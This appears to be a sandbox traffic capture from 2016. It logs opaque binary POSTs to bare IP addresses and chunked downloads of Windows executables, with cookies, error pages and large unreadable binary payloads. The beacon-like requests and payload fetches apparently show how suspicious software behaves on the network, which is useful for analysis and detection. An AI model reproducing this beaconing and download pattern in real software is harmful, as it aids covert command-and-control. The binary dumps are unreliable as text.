.i0g.`(~}..*|^bY.... ...b..R.R.8/......p.1..*..3.g.C,..3..P..!.....)..
x...1..*W.\S.....#..8z _.......f...;......]0=...........qv.o...6.>1
......g...?..<...u.K....K~.....x..,......,(.&..f.W.....)BF...`.H.f8
.09|......2l..p.S.U|m%^......#..gx.}..Y}..>}.../8(;....o.Q./.._..?.
}d...!...|..?...x.M....?....^o.....-....z.w?.P............w`.L.2.."0..
g...bBo..J.r.."Z...XR....s.-...R..V!f...E.@...] .fff.d..5..W .'.(...?.
'n....|...p.._tTWn.M......x.%.,W{.Z....Ax..ox......s./}......o~P......
......G..8..m..u.4...A1..j..EktN.v...?.V!. .r...7'...X...O...nc.D.fR..
.3A............TF...2..t........cbW...%.3...o&......zW...K7?..~..g>
.E....j0...".._..0.o. }...h..8j......(...._x.../I...;q^.....A.... ..".
C.1T.D.C*...WNL$.....a......?..T;[.s.v.."..c.........L0...l.T.O.`r.C..
|3,]..1.x.U.....]v..7...;.....K.N..C..35....Z....\f"r.k.F>.%..;...k
[email protected]..."r;.. .8Q......`.q..a....}/.H...g.d
<<< skipped >>>


POST / HTTP/1.1
Host: 123.129.242.154:80
Content-type: application/octet-stream
Content-Length: 252
Connection: Keep-Alive

<...........C.._....K2t......ZWX.jIW.......".L".2r.l}X3 .?K.J.......fM...........k.....6....R..D.A.t[.$.b3D....A .......1.Bu..L!.q.pC.=.K].U\..%....%b....e....w.Z...?..1.l...[<......!.%......\3.G..ZG@$..!....2.....\.....9.^...5.Fz...(..T..]....v4Y
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 28..Content-Type: application/octet-s
tream..Connection: Close..<............$......4..@..`#..



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=1065841-1766681
Referer: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=3869205-4570045
Referer: hXXp://112.5.251.213/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=11326565-11578455
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:38 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



HEAD /cooperation/popuprecommend/cooperation/install_finish.html HTTP/1.1
User-Agent: HttpRequest
Host: yze.t.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 200 OK
Date: Thu, 19 May 2016 04:36:34 GMT
Content-Type: text/html
ETag: "1298424334"
Accept-Ranges: bytes
Last-Modified: Tue, 25 Aug 2015 02:59:17 GMT
Content-Length: 1403
Server: WS CDN Server
Age: 9394
Via: 1.0 db80:8500 (Cdn Cache Server V2.0)
Connection: close



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8649874-8660250
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:44 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8660251-8701287
Referer: hXXp://112.5.251.214/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /128128.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.app.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 1564
Expires: Thu, 19 May 2016 07:13:09 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db80:7002 (Cdn Cache Server V2.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD>.<ME
TA HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312"> .
<TITLE>......................URL..........</TITLE>.<STY
LE type="text/css"><!--BODY{background-color:#ffffff;font-family
:verdana,sans-serif}PRE{font-family:sans-serif}--></STYLE>.&l
t;/HEAD><BODY>.<H1>....</H1>.<H2>..........
......URL..........</H2>.<HR noshade size="1px">.<P>
.......................URL.......<A HREF="hXXp://dl.app.sogou.com/1
28128.png">hXXp://dl.app.sogou.com/128128.png</A>.<P>..
..................<UL>.<LI>.<STRONG>.Unable to forwa
rd this request at this time..<BR>..............................
..</STRONG>.</UL>..<P>.This request could not be for
warded to the origin server or to any.parent caches.  The most likely 
cause for this error is that:.<UL>.<LI>The cache administr
ator does not allow this cache to make .    direct connections to orig
in servers, and.<LI>All configured parent caches are currently u
nreachable..</UL>.</P>.<P>..........................
..............................................................<UL&g
t;.<LI>.........................................................
..<LI>.................................................</UL&g
t;.</P>.<P>....................<A HREF="mailto:wssu
<<< skipped >>>


POST / HTTP/1.1
Host: 58.254.134.209:80
Content-type: application/octet-stream
Content-Length: 44
Connection: Keep-Alive

A...
... ...A:.=.._}.gS ..4<.g..\.9#}..4U...
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 28..Content-Type: application/octet-s
tream..Connection: Close..A...........Z-(j#F.ea....~....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8619214-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:43 GMT
Content-Type: application/octet-stream
Content-Length: 3090314
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8619214-11709527/11709528
_. .g{.......3.r......9...w...)..O.... eU....EEz..e..q...(Y.4t^8./..L.
..v..%$.......X.5.EI..n~......?....V.Y^P...qf..........*>]....Uu.CW
...`mR.P..b.np....Th..Ir..M.s!]..~......4.......w..r.q...RQ...jk..Iw.f
.............;!b.....62.w..x.....N...0..[... >..2-2...>>O({..
.....bM=.X.~..`...B. ....:F.zO...._......8.w_..)..... (....v7t.....`.`
-...K....X..4.l..^n.!..y...x4R...z...'.[[email protected]=.m..q4x.....
..g...&^p.....Dr"0...?.P..[..]YR..%p..@=..k.NT..'6....7...R....l.GHn..
.......R.w.&J..u*.w..D ^ ..:(..x..{@l"....P..\..m....Y..5..Xk....gn.8.
/..Y.r....).._H.....TMy..Z7?..M...5.....z.J.....?.*E..Q.A........4...D
9n......C....t.R...)..... .&.6. .N;.............=.....g..se@.[.Zj.....
..Z.G..T...q.K...kOiJ....Y.......X..cnK...TN]?f`R. ..:.K<.<....X
..4./2....._.LYy.~}\.7.....|.........P...t..O{...<."...o....v.%z0X.
....j.i.f.sT...sL.X...../uc.i....J-..nG...8.'Z..0..`...F..XT^...g.EmJ.
?.._,q{.]....qr...[....7.-.ju.i....-5..v..i.-f.k.....&.e.s.,7...f..."r
."....C>U[...v.........f2...P..U!.|~C../..f..............voo.n."...
..i..qcV?..Gnz....>[email protected]
[email protected]...|.........?-O...
...2..?.......C..)\.O.....*..Fi....2!.)...=.{..?o^. .zb.....yz.w...D..
.-..d.2......ljw.s.A{... V..i.:...gM....6.....[...G*O.`C4..[...Y.....v
....L.h35..k<>.....CJ*`:.I............."..j.{....V_I.=...ST.{...
.t.q..yq...fZ.m.#.$r..RC.......%.......4.....|...K..`...Epz......s.f..
8g,....v#O.....U.?\p. .....A...6.kc........l4..q....J..qG.......FE
<<< skipped >>>


HEAD /pc_logo/7638937123950702413.png HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: dl.app.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:08 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:08 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=5971728-11578455
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 5606728
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 5971728-11578455/11709528
]?>.n.'..Q...m.[!.y....&...N.[..<snC...T.8..........0.(Y...T....
.... ...9..f{a.........l.y.k[vD.. ..^..x....K.K.....S....."%...e...^..
..lD..~.!.#..\.4.r....Mk..9.T#v...].S.....\.....j..'.<....n..D.....
...V.O4.... .:.l..C7b..h[...b...>{....-x.O.0. ..,o........(...aops.
.!..h.|....j.OB.......9...Fe.v..;.z..(.f'...K.....~.}..3....n.4A.7.(..
G.3.w....b...z.#...m7{,7k......n...;.0..*. 186.e.. .rHg.z&.'d...*. G.:
j.^!.A....... ..0D......(. ............mC=a".;[email protected][.24.o..V!,.HH
........ N.5N...%...OI...K~..YC....Li......]2...aX..W..1m..y........;I
9.....R..*..k.&.#@i.1..tQ...Y.4c.*J.. [email protected]/k.6H..!.....S...
..I......o.....7%...FF.1.....D...O....n.........(...F^L.`..0\.s...}...
.[[email protected]?.`.D{...4..."&.,V........l..)s...|.
..~..C ..r.j.`..r.]....,.0..._..S...}..W*.....6_..y.....VN.~.y.j..w2?.
...Xfp....x.....^.Xh...^....k1G#..`0.S..-S..!......U2...cm...$.[.|.y..
p.|.g>.}...~o...~#..H:.......|W.6Z...(....)....Q..m[._....x...jD...
.K.....^.J.."j.V.....L...D......2....p..".B..U(..|J(<...gm......g..
.q.9W.....s?.......|5........RL|>.#.4F3df...k}..CpB.%8.9S.....O..w.
.W...`#....w.......3.h..8..\....y)'w..`.".......0.F.. X.m.'..;q1......
..C.......of.ZX^~..!\..`..F.lB.{..6...u...T.]J|...D...f..~.>...]*..
O.o3....Eq.y!.&...f..i.D.(.%.f..[.8...oGmG8..6....|.;.L8I....c......Un
P..X.m?.:.....P#y7....|.Fe<....j....T..C...f.....>..8/B.Z......N
b...R.r..;!y..=......m31.?..3...j.?...T68Yk....h..C..q.!.......*.....8
.F)G..LJ..ro.:...yn..&..!."Sh.R7..._Q...B.d.zI(.1)7..!,)rA...0.z./
<<< skipped >>>


POST / HTTP/1.1
Host: 122.143.5.59:80
Content-type: application/octet-stream
Content-Length: 92
Connection: Keep-Alive

@.......P...........V.......mK9[4[....*J..hrQ.'.4..]$ .a8..h(.&..........t.1..b...m..%..S...
HTTP/1.1 200 OK
Content-Length: 8604
Content-Type: application/octet-stream
Connection: Close
@........!.......g;.9..S..1.l.r.>../.....i....U..F.Ur........\}..[.
.]2.4...~.[..J^..c`...`........C]..]..'Q.....m.[z\).#...w.Pq.....:.W..
X.L[.Y.lv....~5p.|...6..v-i.....Qz. ...k..Nk...^.. N"S...r0S.L~..<r
qLN ."wXO...@.".#7.}l.A..H..s&l'.87k;.K.... ..7..bXuv.F.c......!..IHs.
6....<..........%p.~.B.S x7w..`E..)..%..Fw....O.& |a..i..a!..3;Jn..
..[B.=..G/..B.0KlR.D..|..j.OT._..BZ...#..^.....D...3..}.2.h<D./..!}
[email protected]{S....K....-..
.v....>o.z..E.WE.W.=H.....^*...Z8.rM.O.. I.R....,&<....~n.......
[email protected]?{z.......-9<.k
*..2Y...(7.d..0H.4...K....>[email protected]..].t`[email protected].
l..} H..O....}.d......C.42....@8dRY....%..}V0|P.......K.$.._....V.....
....z\......w....(....L....F2.....05.w..hp.y....8P.)..G66...y.....q...
......l...T;5.b...?.}U..5u.Q..@.@Z..(?M.%[email protected]..}E....U...[!.E
N..O..V;.dL.....o2)|.,.4.!....G..?...o?c.5..e.g..Qb.(...r.5.. .o......
.9........kD9...pW.0`.}.D;....m=.;..F.......k......".......H.>...2.
..$sU..V...B.h.W../..V....|.|....t.........)g6.y..A...)....,.Vz.IGL/{d
t0PvgdD.rws..\[email protected]<..'.....-R#.@e.,..8*..9...
.m.yF.P..Zs..\..JXN......{.cq....-.U(.....1.sZ..V.-./.....,[email protected].&g
t;...n1A..r}.........}.C.7.Z3.....E9...h...P......Q.Y..Y...3......>
..TS..Y.~.}....|. .Jm...e....k{=D....3..'[......z.zu..Y......|.{......
.1.uI>7..Lj'\...:A..wN....O.>(..n........r:.G...K9..H.....l.u...
......._...B....}..F. .i.....6._...W.f@.`..0C`.....3..7.B}..^._b..
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=11326565-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: application/octet-stream
Content-Length: 382963
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 11326565-11709527/11709528
....u.......s.z..j.(e.O..:..I..m.s: ."[email protected].&.....`....v..
K0....~..._bk.6....v...H5...,.....I.;Pr....'..\r.. ..`HD....E..O.... d
J.Bi.!.[.'....x.n.-..W[.$6O..>%!Q... ;.a...}L.a...s- ...........8..
...m.p......T......37.......a.jo..V.~....%*. ...D........4.W....3.2...
.YCC:.b.Z\..K'...j....8|.,.......NP.....hh.m.[.j'...........M..Od.aZ.Y
...S.....z.v....R...D =..q....p..`..0.X..u.. .V....ivQ.a=m$..........!
.n...=......O2.....a.. .w................$.k~.....m.{.m.....J..Y....,.
m~.J`.=.............T$"0X......F..Gy....*.?.3d...x..E.A..!Y.[.].....(J
..k...u...GL.YBaI.-.XV...T.t..K.2N\.B...zu.,...X...U.d......W.........
.....C...U4.......I...J..{/-......#S..r........f_zm{........p$E..S....
.....^.*t..;..u...2....{.J....X.rc.V.W.8.".....V....9...V9.G<.{L.0.
.......4....<<[email protected][email protected]/.:=..B...{..`........
..k..".......<{}.....H`....%S.....6*.......G/r.1^....1.0....Z.:vs..
...V..xA..=G%...[k..?............a.f.........c:.....%....O..Xajx.3..F7
....B..S.u..GQk\.p...p.`......g.Y.zt.g... ......AZ. .....;.%..^.N.x)..
.E..... .....4...h%2V.0..}d.. r.....$..1...,!..-..%.. .z..?.K.,"z...).
b...F.ct ......1O.).i..[U.:..1....1.U.V..Pr...!A.*4o.O.KM....)W..-....
r..`....A7....!o.....3...|\L...KH..|.G.]..Y..V..f.......?...p"..w7.5..
.?.R.y.......w.t)!...^J,..osP..:.<A..S./Wj.!..zF...04C..Y..=..%..69
B.#..u.......U...-'.Z...L.^....z8.....c.#eh.A.C..%SpX..%.2..,)N^..&..I
....H...J........YF<[email protected]..~.;..X.Y..r.n..e-.....x...@<{..
z.-..].*.K9<[email protected]?..l...l...=..X.......m..)"f....f.
<<< skipped >>>


HEAD /pc_logo/7638937123950702413.png HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: dl.app.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:50 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:50 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close



POST / HTTP/1.1
Host: 58.254.134.238:80
Content-type: application/octet-stream
Content-Length: 108
Connection: Keep-Alive

A.......`...g...@w/............W...%8-.$.RRt%...^K..*.{~)...p...n..c....6...5.:l...w.e..V...8.'.......R..@..
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 28..Content-Type: application/octet-s
tream..Connection: Close..A.............,3P......%...a..



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5733707-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:38 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=11386975-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:46 GMT
Content-Type: application/octet-stream
Content-Length: 322553
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 11386975-11709527/11709528
.p...#.3{.....B.Y.VUf.....{..1...Y9....pw...5...lQ.].9=.....Tn......&g
t;~.zX...N.b..S......._.(.....D.".m..f..g.X3.VC,\J ..Q.HuI.mThH_....|9
....I.~......*....zVT.d.,x..._..*.?d.t..0..4..r..........&b.....".q$..
.W.....`[email protected].]K=.pWw....r)v9&..3..J.o4mZ.......
.?..1.?..>....].|F.M.......&.hB..-u.S.!s._......t..6 ... .p,.P.....
#v.X....|K.v.....t.;.".._..#c..c )).=Zh2L|*5=.|C....b.u.$.-J...S^....k
.t..D.....Va..._.Z..#^..{..D.8#.N!Dd...%. .X..{h..y,.......,.9.....a.j
.... &..V....:._J..tM..:qW^....N..{.,.{.....t."....cbp....L..Z3..W.Xk 
rz.s.[.Af.......q........|.9..m.S.....ZM.hm....1.1.Tb...5...B....H.(=.
d.U/..W'.[.U.......mD........e......#..)..E....Y...*9<..7R_......;n
Fn..*..V...r......6l.z.5.XXhg......%.......H9...m...f.8.<M..qNX.].d
.C.........).L..A...F.(...&.G.?..1..cc{.H...1Hp.`/..D....KO.yu...J.Gj1
_.n.L..o......#..0b.W...._..r..(..uG...c..R3....2.....Zg..F.*2..Sj:.. 
2...L.R.;k..........g.U.c........a:D,.%*._<.Tf.........h..UB..AV...
e.6.d.zZ(js..f.....fv......7I...R>ON.V e....J.pI\g.N.*.v.2.F3 .j...
^.%E..MU...=.dZ.....~.4.......t......&.ZV5.I.1....J....Gr&...G......?.
..]]....'=B]E.~f...d....H...p......R....c.....On3..C)...s..K..A....N8f
.9.,..^H...|...*b...5.......T7.W....E......>K.L....R].e..._Z..1....
&5.t..D...^.....~....E..s....0G...........(.......R.-s5..L..5....^....
G-|U.,...D.g........(B...b..........0...e5...vS...!....[B..8....z.X...
.&q...|...N .6......V..xb.#O].XR/..ZO....Q.hTz'..`V.(.CXmj=.t.......^.
...... ...O..3<..v....y4U..H .2.2_..."..oyV{.....?2....'......y
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=1701146-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: application/octet-stream
Content-Length: 10008382
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 1701146-11709527/11709528
....p......mFS.P u........B..1..A.....U.,.... 5u.....tC...a..D.%*!d..|
.........Lm....Sfs|2.S....s.A.X..hqh........hAO.....}@.Dv.....3.?>[
.y...y.I0on......>8.Z...`..n....W.b..U6K.AM..tM\$..X...1642...(..w.
xT...G..*....DF.v....`%....K._b....y].. .4...$^.....s..Qe...W....j....
VsE#.L'.ck..*......36..^...7a n.nD.n.]2.e....l"<G..v^>.1_I.".[..
....ygTuO....`....uZ....._......B.&..,.......Z........mv..".($m..r.oQ.
....d.a...4"G....bu&.t........{.......%...C.ks......(j.B.Q.....E......
.....mX.x(/.|x .8.l...D....2c/..zB..<|&..%x.."..s..;....%.9.a.T.=.)
.O\P[.O..........y3..<.......|. ..h..'...VH.......I..`.U,.E.Z.S.; (
rP2.D..%c.......]....S,...c....66.2.]..Uc..a..5..!vL....'....{...0rw..
...UU...2.Ff.2...VCn.......ko.........7....v....K...b ......M....*9...
...U.D....z..T....;...D.N.r..Y...|."Hy.ip.. .U`=fF./.r.....W.........u
..2.iW..".-...E.S.*.uM..z......7....'.. ..$.:.....U....I..}...$os_b...
O.~zZ.K.M.M...z.....$u..,.q..$%..s......tg0.......u.9.=~....?.Hv...uJ.
[email protected]@.......|.MP,..S.da..U&'`.R..m....*B..Zb. ...F,..c.. .H.&....
s.F.X.F..B`.'..u.......c.D..)Uq.6.........O0%*hSV.7|.../...AA.V.y..".L
B.........^6l.R.Q...ox..~.....3E......0....E2&..hL..B,.........*6. ...
..o..~.Q....HC..........#lT.......vb^.C.S_.......!D..vhHL...5.).~..y{.
..6.....R%.lI[...0ze...}/hv..h..........{L...k...;_..v...w.)....!...7.
{.w..PY.e.OTev....e.......j.D. p.....qCt.&.....^Z...A;?.........Hn.<
;.l...H.nE. .%q_/.x.vNY/f..Dm...`m"'..,[email protected]..;..f..H. ..~
.....Aq.3.........8...v.!../.g..wd..".....>F]0Jl.N?...q.N.....s
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8508097-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: application/octet-stream
Content-Length: 3201431
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8508097-11709527/11709528
